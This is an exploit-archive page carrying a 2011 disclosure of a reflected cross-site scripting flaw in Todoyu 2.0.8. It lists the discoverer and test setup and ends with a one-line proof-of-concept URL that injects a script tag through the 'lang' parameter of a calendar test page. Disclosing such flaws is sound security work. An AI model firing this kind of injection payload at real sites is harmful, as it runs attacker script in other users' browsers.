Home / exploitsPDF  

Todayu 2.0.8 Cross Site Scripting

Posted on 22 April 2011

# ------------------------------------------------------------------------ # Software................Todoyu 2.0.8 # Vulnerability...........Reflected Cross-site Scripting # Threat Level............Low (1/5) # Download................http://www.todoyu.com # Discovery Date..........4/21/2011 # Tested On...............Windows Vista + XAMPP # ------------------------------------------------------------------------ # Author..................AutoSec Tools # Site....................http://www.autosectools.com/ # Email...................John Leitch <john@autosectools.com> # ------------------------------------------------------------------------ # # # --Description-- # # A reflected cross-site scripting vulnerability in Todoyu 2.0.8 can be # exploited to execute arbitrary JavaScript. # # # --PoC-- http://localhost/todoyu/lib/js/jscalendar/php/test.php?lang=%22%3E%3C/script%3E%3Cscript%3Ealert%280%29%3C/script%3E

 

TOP